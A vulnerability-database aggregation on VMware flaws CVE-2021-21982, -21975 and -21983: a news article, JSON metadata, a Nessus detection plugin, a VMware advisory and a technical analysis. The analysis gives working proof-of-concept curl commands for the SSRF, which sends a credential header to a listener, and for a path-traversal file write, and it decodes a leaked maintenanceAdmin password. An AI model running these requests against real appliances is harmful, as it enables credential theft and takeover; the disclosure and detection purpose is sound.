A critical vulnerability in the VMware Carbon Black Cloud Workload appliance could be exploited to bypass authentication and take control of vulnerable systems.
Tracked as CVE-2021-21982, the flaw is rated 9.1 out of a maximum of 10 in the CVSS scoring system and affects all versions of the product prior to 1.0.1.
Carbon Black Cloud Workload is a data center security product from VMware that aims to protect critical servers and workloads hosted on vSphere, the company's cloud-computing virtualization platform.
"A URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication," VMware [said](<https://www.vmware.com/security/advisories/VMSA-2021-0005.html>) in its advisory, thereby allowing an adversary with network access to the interface to gain access to the administration API of the appliance.
Armed with the access, a malicious actor can then view and alter [administrative configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>), the company added.
In addition to releasing a fix for CVE-2021-21982, VMware has also [addressed](<https://www.vmware.com/security/advisories/VMSA-2021-0004.html>) two separate bugs in its vRealize Operations Manager solution that an attacker with network access to the API could exploit to carry out Server Side Request Forgery ([SSRF](<https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/>)) attacks to steal administrative credentials (CVE-2021-21975) and write files to arbitrary locations on the underlying [photon](<https://github.com/vmware/photon>) operating system (CVE-2021-21983).
vRealize Operations Manager is primarily designed to monitor and optimize the performance of virtual infrastructure and to support features such as workload balancing, troubleshooting, and compliance management.
Egor Dimitrenko, a security researcher with Positive Technologies, has been credited with reporting all three flaws.
"The main risk is that administrator privileges allow attackers to exploit the second vulnerability—CVE-2021-21983 (an arbitrary file write flaw, scored 7.2), which allows executing any commands on the server," Dimitrenko [said](<https://www.ptsecurity.com/ww-en/about/news/vmware-fixes-dangerous-vulnerabilities-in-software-for-infrastructure-monitoring-discovered-by-positive-technologies/>). "The combination of two security flaws makes the situation even more dangerous, as it allows an unauthorized attacker to obtain control over the server and move laterally within the infrastructure."
VMware has released patches for vRealize Operations Manager versions 7.0.0, 7.5.0, 8.0.1, 8.1.1, 8.2.0 and 8.3.0. The company has also published workarounds to mitigate the risks associated with the flaws in scenarios where the patch cannot be installed or is not available.
{"id": "THN:4640BEB83FE3611B6867B05878F52F0D", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Critical Auth Bypass Bug Found in VMware Data Center Security Product", "published": "2021-04-07T08:03:00", "modified": "2021-04-07T09:38:17", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 8.5}, "severity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 9.2, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, "href": "https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2021-21975", "CVE-2021-21982", "CVE-2021-21983"], "immutableFields": [], "lastseen": "2022-05-09T12:38:23", "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0234", "CPAI-2021-1066", "CPAI-2022-0230"]}, {"type": "cisa", "idList": ["CISA:D7385BDD2786721598A2135E182282C2"]}, {"type": "cve", "idList": ["CVE-2021-21975", "CVE-2021-21982", "CVE-2021-21983"]}, 
{"type": "githubexploit", "idList": ["1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "33268543-6217-5EB6-9E15-3AD5A03E3B8E", "35114B1B-006F-5732-8E42-9E8643B61C2A", "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "7663BC50-C08E-5741-B771-BE50606E7B78", "7A372D54-3708-5032-B00A-2B54C2137FB7", "911A7F63-1DBC-54A3-820C-F8F19E006338", "D5702470-2A4B-5116-9B9F-4001BDD6935C"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-HTTP-VMWARE_VROPS_MGR_SSRF_RCE-"]}, {"type": "nessus", "idList": ["VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162349"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF"]}, {"type": "seebug", "idList": ["SSV:99173", "SSV:99174"]}, {"type": "thn", "idList": ["THN:868A288940CAEB61BD09AB7B818AD160"]}, {"type": "threatpost", "idList": ["THREATPOST:6C1025257B798335D913F95B63229B76", "THREATPOST:98B57FBF6D83FA4D12BEE06C0281FF91", "THREATPOST:9AD64DC6BE4117F56E76B2BF8F28A597", "THREATPOST:E3FA0D5BB017B7DD39D5924D32A9A668"]}, {"type": "vmware", "idList": ["VMSA-2021-0004.1", "VMSA-2021-0004.2", "VMSA-2021-0005"]}, {"type": "zdt", "idList": ["1337DAY-ID-36160"]}]}, "score": {"value": 1.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0234"]}, {"type": "cisa", "idList": ["CISA:D7385BDD2786721598A2135E182282C2"]}, {"type": "cve", "idList": ["CVE-2021-21975", "CVE-2021-21982", "CVE-2021-21983"]}, {"type": "githubexploit", "idList": ["1E8AE40F-314C-5935-B6FB-4F9B8A73A0E4", "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "35114B1B-006F-5732-8E42-9E8643B61C2A", "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "7663BC50-C08E-5741-B771-BE50606E7B78", "7A372D54-3708-5032-B00A-2B54C2137FB7", "911A7F63-1DBC-54A3-820C-F8F19E006338", "D5702470-2A4B-5116-9B9F-4001BDD6935C"]}, {"type": 
"metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/VMWARE_VROPS_MGR_SSRF_RCE/"]}, {"type": "nessus", "idList": ["VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162349"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF"]}, {"type": "seebug", "idList": ["SSV:99173", "SSV:99174"]}, {"type": "thn", "idList": ["THN:868A288940CAEB61BD09AB7B818AD160"]}, {"type": "threatpost", "idList": ["THREATPOST:6C1025257B798335D913F95B63229B76", "THREATPOST:98B57FBF6D83FA4D12BEE06C0281FF91", "THREATPOST:9AD64DC6BE4117F56E76B2BF8F28A597", "THREATPOST:E3FA0D5BB017B7DD39D5924D32A9A668"]}, {"type": "vmware", "idList": ["VMSA-2021-0005"]}, {"type": "zdt", "idList": ["1337DAY-ID-36160"]}]}, "exploitation": null, "vulnersScore": 1.1}, "_state": {"dependencies": 1660004461, "score": 1659897207}, "_internal": {"score_hash": "904278b744f07c1517be498021c10206"}}
{"seebug": [{"lastseen": "2021-07-24T15:55:32", "description": "# Description\n\nOn March 30, 2021, VMware published a [security advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for [CVE-2021-21975](https://nvd.nist.gov/vuln/detail/CVE-2021-21975) and [CVE-2021-21983](https://nvd.nist.gov/vuln/detail/CVE-2021-21983), two chainable vulnerabilities in its vRealize Operations Manager product. CVE-2021-21975 is an unauthenticated server-side request forgery (SSRF), while CVE-2021-21983 is an authenticated arbitrary file write. Successfully chaining both vulnerabilities achieves unauthenticated remote code execution (RCE) in vRealize Operations Manager and any product using it as a component.\n\nAt the time of public disclosure, Positive Technologies [tweeted](https://twitter.com/ptswarm/status/1376961747232382976) about CVE-2021-21975 and CVE-2021-21983, which were both discovered by their researcher [Egor Dimitrenko](https://twitter.com/elk0kc).\n\n# Affected products\n\n- vRealize Operations Manager\n - 7.0.0\n - 7.5.0\n - 8.0.0, 8.0.1\n - 8.1.0, 8.1.1\n - 8.2.0\n - 8.3.0\n- VMware Cloud Foundation (vROps)\n - 3.x\n - 4.x\n- vRealize Suite Lifecycle Manager (vROps)\n - 8.x\n\n# Technical analysis\n\nCVE-2021-21975 is the primary focus of this analysis.\n\n## CVE-2021-21975 (SSRF)\n\n`/nodes/thumbprints` (mapped to `/casa/nodes/thumbprints`) is an unauthenticated endpoint.\n\n```\n <sec:http pattern=\"/nodes/thumbprints\" security='none'/>\n```\n\nIt accepts a `POST` request whose body is a JSON array of network address strings.\n\n```\n @RequestMapping(value = {\"/nodes/thumbprints\"}, method = {RequestMethod.POST})\n @ResponseStatus(HttpStatus.OK)\n public ArrayList<ThumbprintResource> getNodesThumbprints(@RequestBody String[] addresses) {\n return this.clusterDefService.getNodesThumbprints(new HashSet(Arrays.asList((Object[])addresses)));\n }\n```\n\nEach address is sent a crafted `GET` request, leading to a partially controlled 
SSRF.\n\n```\n public ArrayList<ThumbprintResource> getNodesThumbprints(Set<String> addresses) {\n ArrayList<ThumbprintResource> ipToThumbprint = new ArrayList<>();\n if (null == addresses) {\n return ipToThumbprint;\n }\n configureInsecurRestTemplate();\n\n HttpMapFunction f = new HttpMapFunction(addresses.<String>toArray(new String[addresses.size()]), RequestMethod.GET, \"/node/thumbprint\", null, null, this.webappInfo, this.timeoutForGetRequest, this.restTemplate);\n\n\n\n\n\n\n\n\n HttpMapResponse[] responses = f.execute();\n\n for (HttpMapResponse resp : responses) {\n if (resp.getHttpCode() == HttpStatus.OK.value()) {\n String data = resp.getDocument().replace('\"', ' ').trim();\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), data));\n } else {\n ipToThumbprint.add(new ThumbprintResource(resp.getSliceAddress(), null));\n }\n }\n\n return ipToThumbprint;\n }\n```\n\n### PoC\n\nThe [provided workaround](https://kb.vmware.com/s/article/83210) provided enough information to develop a PoC.\n\n```\nwvu@kharak:~$ curl -k https://192.168.123.185/casa/nodes/thumbprints -H \"Content-Type: application/json\" -d '[\"192.168.123.1:8443/#\"]'\n```\n\nAppending `#` (presumably [URI fragment syntax](https://en.wikipedia.org/wiki/URI_fragment)) to the SSRF URI allows for full control of the `GET` request path.\n\n```\nwvu@kharak:~$ ncat -lkv --ssl 8443\nNcat: Version 7.91 ( https://nmap.org/ncat )\nNcat: Generating a temporary 2048-bit RSA key. 
Use --ssl-key and --ssl-cert to use a permanent one.\nNcat: SHA-1 fingerprint: DD68 63E6 C329 1851 F74F 797A F684 7823 207A 55E7\nNcat: Listening on :::8443\nNcat: Listening on 0.0.0.0:8443\nNcat: Connection from 192.168.123.185.\nNcat: Connection from 192.168.123.185:36070.\nGET / HTTP/1.1\nAccept: application/xml, application/json\nContent-Type: application/json\nAccept-Charset: big5, big5-hkscs, cesu-8, euc-jp, euc-kr, gb18030, gb2312, gbk, ibm-thai, ibm00858, ibm01140, ibm01141, ibm01142, ibm01143, ibm01144, ibm01145, ibm01146, ibm01147, ibm01148, ibm01149, ibm037, ibm1026, ibm1047, ibm273, ibm277, ibm278, ibm280, ibm284, ibm285, ibm290, ibm297, ibm420, ibm424, ibm437, ibm500, ibm775, ibm850, ibm852, ibm855, ibm857, ibm860, ibm861, ibm862, ibm863, ibm864, ibm865, ibm866, ibm868, ibm869, ibm870, ibm871, ibm918, iso-2022-cn, iso-2022-jp, iso-2022-jp-2, iso-2022-kr, iso-8859-1, iso-8859-13, iso-8859-15, iso-8859-2, iso-8859-3, iso-8859-4, iso-8859-5, iso-8859-6, iso-8859-7, iso-8859-8, iso-8859-9, jis_x0201, jis_x0212-1990, koi8-r, koi8-u, shift_jis, tis-620, us-ascii, utf-16, utf-16be, utf-16le, utf-32, utf-32be, utf-32le, utf-8, windows-1250, windows-1251, windows-1252, windows-1253, windows-1254, windows-1255, windows-1256, windows-1257, windows-1258, windows-31j, x-big5-hkscs-2001, x-big5-solaris, x-compound_text, x-euc-jp-linux, x-euc-tw, x-eucjp-open, x-ibm1006, x-ibm1025, x-ibm1046, x-ibm1097, x-ibm1098, x-ibm1112, x-ibm1122, x-ibm1123, x-ibm1124, x-ibm1166, x-ibm1364, x-ibm1381, x-ibm1383, x-ibm300, x-ibm33722, x-ibm737, x-ibm833, x-ibm834, x-ibm856, x-ibm874, x-ibm875, x-ibm921, x-ibm922, x-ibm930, x-ibm933, x-ibm935, x-ibm937, x-ibm939, x-ibm942, x-ibm942c, x-ibm943, x-ibm943c, x-ibm948, x-ibm949, x-ibm949c, x-ibm950, x-ibm964, x-ibm970, x-iscii91, x-iso-2022-cn-cns, x-iso-2022-cn-gb, x-iso-8859-11, x-jis0208, x-jisautodetect, x-johab, x-macarabic, x-maccentraleurope, x-maccroatian, x-maccyrillic, x-macdingbat, x-macgreek, x-machebrew, x-maciceland, 
x-macroman, x-macromania, x-macsymbol, x-macthai, x-macturkish, x-macukraine, x-ms932_0213, x-ms950-hkscs, x-ms950-hkscs-xp, x-mswin-936, x-pck, x-sjis_0213, x-utf-16le-bom, x-utf-32be-bom, x-utf-32le-bom, x-windows-50220, x-windows-50221, x-windows-874, x-windows-949, x-windows-950, x-windows-iso2022jp\nX-VSCM-Request-Id: ak00003Y\nAuthorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\nCache-Control: no-cache\nPragma: no-cache\nUser-Agent: Java/1.8.0_212\nHost: 192.168.123.1:8443\nConnection: keep-alive\n```\n\nNote the `Authorization: Basic` header, which is present in older vulnerable versions but missing from 8.3.0. The Base64 `bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=` decodes to the credentials `maintenanceAdmin:RfdsxK/5M4MSk2si174KIhDV`.\n\n## CVE-2021-21983 (file write)\n\nCVE-2021-21983 is a path traversal in the `/casa/private/config/slice/ha/certificate` endpoint.\n\n```\n @RequestMapping(value = {\"/private/config/slice/ha/certificate\"}, method = {RequestMethod.POST})\n @ResponseBody\n @ResponseStatus(HttpStatus.OK)\n @Auditable(category = Auditable.Category.CONFIG_SLICE_CERTIFICATE, auditMessage = \"Accepting replicated certificate from Master slice\")\n public void handleCertificateUpload(@RequestParam(\"name\") String name, @RequestParam(\"file\") MultipartFile multiPartFile) {\n try {\n this.certificateService.handleCertificateFile(multiPartFile, name);\n } catch (Exception e) {\n this.log.error(\"Error handling replica certificate upload: {}\", e);\n throw new CasaException(e, \"Failed to upload replica certificate\");\n }\n }\n void handleCertificateFile(MultipartFile multiPartFile, String fileName) {\n+ if (fileName == null || !fileName.equals(\"cakey.pem\")) {\n+ throw new CasaException(\"Wrong cert file name is provided\");\n+ }\n File certFile = new File(this.certDirPath, fileName);\n\n try {\n multiPartFile.transferTo(certFile);\n\n certFile.setExecutable(false, false);\n } catch (Exception e) {\n throw 
new CasaException(\"Error writing Certificate file: \" + certFile.getAbsolutePath(), e);\n }\n }\n```\n\n### PoC\n\n```\nwvu@kharak:~$ curl -kH \"Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpSZmRzeEsvNU00TVNrMnNpMTc0S0loRFY=\" https://192.168.123.185/casa/private/config/slice/ha/certificate -F name=../../../../../tmp/vulnerable -F \"file=@-; filename=vulnerable\" <<<vulnerable\nwvu@kharak:~$\nroot@vRealizeClusterNode [ /tmp ]# ls -l vulnerable\n-rw-r--r-- 1 admin admin 11 Apr 5 22:18 vulnerable\nroot@vRealizeClusterNode [ /tmp ]# cat vulnerable\nvulnerable\nroot@vRealizeClusterNode [ /tmp ]#\n```\n\n## IOCs\n\nNumerous log files can be found in `/usr/lib/vmware-casa/casa-webapp/logs`. The file `/usr/lib/vmware-casa/casa-webapp/logs/casa.log` is of particular interest for tracking suspicious requests.\n\n```\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/nodes/thumbprints from 192.168.123.1: New request id ak0000BL\n2021-04-03 07:58:33,113 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.HttpMapFunction:325 - execute, hosts=[192.168.123.1:8443/#], op=GET, relativeUrl=/node/thumbprint, doc={}\n2021-04-03 07:58:33,116 [ak0000BL] [pool-36-thread-1] INFO casa.support.HttpTask:128 - Making HTTP call to url=https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - HTTP GET https://192.168.123.1:8443/#/casa/node/thumbprint\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Accept=[text/plain, application/json, application/*+json, */*]\n2021-04-03 07:58:33,117 [ak0000BL] [pool-36-thread-1] DEBUG casa.support.CasaRestTemplate:147 - Writing [{}] as \"application/json\"\n2021-04-03 07:58:33,118 [ak0000BL] [pool-36-thread-1] INFO casa.support.MaintenanceUserUtils:33 - Maintenance User credentials initialized\n2021-04-03 07:58:43,114 
[ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] WARN casa.support.HttpMapFunction:414 - Error retrieving HttpTask future: java.util.concurrent.CancellationException\n2021-04-03 07:58:43,116 [ak0000BL] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/nodes/thumbprints: Done\n2021-04-05 22:18:22,066 [ ] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.security.UsernamePasswordAuthenticator:104 - Authenticated maintenance user 'maintenanceAdmin'\n2021-04-05 22:18:22,066 [ak0002Q9] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:60 - Request POST /casa/private/config/slice/ha/certificate from 192.168.123.1: New request id ak0002Q9\n2021-04-05 22:18:22,067 [ak0002Q9] [ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/private/config/slice/ha/certificate: Done\n```\n\nNote that the SSRF most likely requires a callback address in order to extract the `Authorization: Basic` header and any credentials it contains.\n\n# Guidance\n\nPlease see the **Response Matrix** in the [advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for fixed versions and workarounds.\n\n# References\n\n- https://www.vmware.com/security/advisories/VMSA-2021-0004.html\n- https://twitter.com/ptswarm/status/1376961747232382976", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "seebug", "title": "VMware vRealize Operations Manager SSRF\u548c\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\uff08CVE-2021-21975 CVE-2021-21983\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "SSV:99173", "href": "https://www.seebug.org/vuldb/ssvid-99173", "sourceData": "", "sourceHref": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2021-07-24T15:47:15", "description": "", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "seebug", "title": 
"VMware vRealize Operations Manager \u4efb\u610f\u6587\u4ef6\u5199\u5165\u6f0f\u6d1e\uff08CVE-2021-21983\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "SSV:99174", "href": "https://www.seebug.org/vuldb/ssvid-99174", "sourceData": "", "sourceHref": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:44:35", "description": "The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to 7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or 8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side request Forgery attack to steal administrative credentials. (CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "nessus", "title": "VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:vmware:vrealize_operations"], "id": "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL", "href": "https://www.tenable.com/plugins/nessus/148255", "sourceData": "# (C) Tenable Network Security, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148255);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2021-21975\", \"CVE-2021-21983\");\n script_xref(name:\"VMSA\", value:\"2021-0004\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0019\");\n\n script_name(english:\"VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"VMware vRealize Operations running on the remote host is affected by a Server Side\nRequest Forgery and Arbitrary File Write vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to\n7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or\n8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side\n request Forgery attack to steal administrative credentials. 
(CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write\n files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vRealize Operations Manager version\n7.5.0.17771878, 8.0.1.17771851, 8.1.1.17772462, 8.2.0.17771778, 8.3.0.17787340 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21983\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21975\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vRealize Operations (vROps) Manager SSRF RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_operations\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vrealize_operations_manager_webui_detect.nbin\");\n script_require_keys(\"installed_sw/vRealize Operations Manager\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'vRealize Operations Manager';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:443);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nconstraints = [\n {'min_version':'7.5.0', 'fixed_version':'7.5.0.17771878'},\n {'min_version':'8.0.0', 'fixed_version':'8.0.1.17771851'}, # For 8.0.0, 8.0.1\n {'min_version':'8.1.0', 'fixed_version':'8.1.1.17772462'}, # For 8.1.0, 8.1.1\n {'min_version':'8.2.0', 'fixed_version':'8.2.0.17771778'},\n {'min_version':'8.3.0', 'fixed_version':'8.3.0.17787340'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "vmware": [{"lastseen": "2021-09-03T02:07:16", "description": "##### **1\\. Impacted Products**\n\n * VMware vRealize Operations \n\n * VMware Cloud Foundation \n\n * vRealize Suite Lifecycle Manager \n\n\n##### **2\\. Introduction**\n\nMultiple vulnerabilities in VMware vRealize Operations were privately reported to VMware. Patches and Workarounds are available to address these vulnerabilities in impacted VMware products. \n\n\n##### **3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975)**\n\n**Description**\n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [8.6](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N>). 
\n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21975 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to impacted deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21975 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below.\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. \n\n\n##### **3b. Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983)**\n\n**Description**\n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [7.2](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>). \n\n\n**Known Attack Vectors**\n\nAn authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21983 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21983 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below. \n\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. 
